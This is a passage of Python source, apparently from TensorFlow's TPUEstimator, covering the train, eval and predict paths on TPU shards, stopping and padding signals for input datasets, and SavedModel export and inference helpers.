tf.compat.v1.summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with tf.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph(ctx)
train_op = tf.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict))
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after the variables for TPU embedding have
# been created on CPU, as the user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = tf.compat.v1.div(
total_loss,
tf.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with tf.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` to have an update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separate thread. So, here we give Estimator the dummy op for all
# metrics.
with tf.control_dependencies(internal_ops_to_run):
dummy_update_op = tf.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies so that
# `internal_ops_to_run` can be executed.
with tf.control_dependencies(internal_ops_to_run):
mean_loss = tf.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls, scaffold_fn,
prediction_hooks) = _predict_on_tpu_system(ctx, model_fn_wrapper,
dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with tf.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with tf.control_dependencies(internal_ops_to_run):
dummy_predict_op = tf.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoids the issue where we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with tf.control_dependencies(host_ops):
host_ops = []  # Empty; we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx,
enqueue_ops,
host_ops,
rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _check_add_preemption_hook(cluster):
return (tpu_cluster_resolver.is_running_in_gce() and cluster and isinstance(
cluster, tf.distribute.cluster_resolver.TPUClusterResolver) and
cluster._cloud_tpu_client.api_available())
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As such, reshape the input to be a scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
# Add an input that represents the id of each replica so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
loss,
) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As such, reshape the input to be a scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
outputs = training_loop.while_loop(
lambda i, loss: i < iterations_per_loop_var,
lambda i, loss: [i + 1, single_tpu_train_step(i)],
inputs=[0, _INITIAL_LOSS])
return outputs[1:]
# Add an input that represents the id of each replica so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(compile_op, loss) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As such, reshape the input to be a scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
def cond(scalar_stopping_signal):
return tf.math.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
# Add an input that represents the id of each replica so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
dummy_predict_op,
) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with tf.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
iterations = tf.identity(iterations_per_loop_var)
return tf.compat.v1.while_loop(
lambda i: i < iterations,
computation, [tf.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return tf.math.logical_not(_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with tf.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
return tf.compat.v1.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph(ctx):
"""Validate graph before running distributed training.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = tf.compat.v1.get_default_graph().get_operations()
# Check if there is at least one CrossReplicaSum operation in the graph.
# This should be introduced by using the CrossShardOptimizer wrapper.
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops and ctx.num_replicas > 1:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in a TensorFlow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext,
self).to_control_flow_context_def(context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def AddValue(self, value):
self.AddOp(value.op)
return value
def __enter__(self):
# pylint: disable=protected-access
self._g = tf.compat.v1.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the case where input_fn returns a `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, tf.compat.v2.data.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = tf.compat.v1.data.make_initializable_iterator(
self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches to exhaust the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = tf.compat.v1.ones_like(
signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
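For example, a dataset element `(images, labels)` is mapped (roughly) to
`{'features': images, 'labels': labels, 'signals': {'stopping': ...,
'padding_mask': ...}}`; the exact contents of `signals` come from
`_StopSignals.as_dict()`.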
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the case where input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = tf.dtypes.bool
if self._stop:
stopping = tf.ones(shape=shape, dtype=dtype)
else:
stopping = tf.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return tf.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, tf.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return tf.math.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For the non-Tensor case, it is used in a SessionRunHook, so we cannot
# modify the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = tf.compat.v1.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = tf.constant(batch_size, tf.dtypes.int32)
check_greater = tf.compat.v1.debugging.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with tf.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = tf.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = tf.compat.v1.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return tf.nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = tf.compat.v1.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = tf.math.equal(batch_size, tensor.shape[0])
with tf.control_dependencies([check_batch_size]):
return tf.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - tf.math.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors across all TPU cores and concat them back, it is
# important to ensure the real data is placed before the padded data, i.e.,
# order is preserved. Given that, the sliced padding mask should be all 0's.
# If this assertion fails, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = tf.math.equal(
tf.math.reduce_sum(sliced_padding_mask), 0)
with tf.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = tf.math.equal(tf.math.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is a full batch or part of the stopping signals, we
# do not need to slice, which saves performance.
return tf.compat.v1.cond(
tf.math.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return tf.nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in tf.nest.flatten(batch_features) if isinstance(x, tf.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
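# For example (illustrative values): real_batch_size=3, missing_count=2 and
# batch_size=5 yield the int32 mask [0, 0, 0, 1, 1].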
padding_mask = tf.concat([
tf.zeros((real_batch_size,), dtype=tf.dtypes.int32),
tf.ones((missing_count,), dtype=tf.dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider using Tensors with smaller shapes or reducing the batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
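# For example (illustrative): `_add_item_to_params({'lr': 0.1}, 'batch_size', 8)`
# mutates the dict to `{'lr': 0.1, 'batch_size': 8}`; for an HParams object the
# same call goes through `add_hparam`/`set_hparam` instead.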
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
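Example (a sketch; `my_estimator` and `serving_input_fn` are illustrative
names assumed to exist):
  export_dir = export_estimator_savedmodel(
      my_estimator, '/tmp/exported_tpu_model', serving_input_fn)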
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
WARNING: THIS METHOD IS DEPRECATED AND IS NOT PART OF THE PUBLIC API.
Make sure to set
`export_saved_model_api_version=tpu_estimator.ExportSavedModelApiVersion.V2`
when initializing TPUEstimator (default API version is V1). This is because
1) `tpu.rewrite` (or `tpu.compile`) shouldn't be called in a nested way
(otherwise validation will throw an error like
"NotImplementedError: tpu_shard_context cannot be nested.")
2) When using the V1 API, Estimator calls `tpu.rewrite`, so
using `model_fn_inference_on_tpu` would trigger a nested call.
When using the V2 API, users of Estimator need to call `tpu.rewrite`
themselves (which is what this wrapper does).
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
using inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params)
tensors = call_computation(features, computation, batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = tf.nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = tf.nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn, labels, config, params):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
tensors_on_cpu = tf.compat.v1.tpu.rewrite(tpu_computation)
tpu.prune_unconnected_ops_from_xla(tf.compat.v1.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
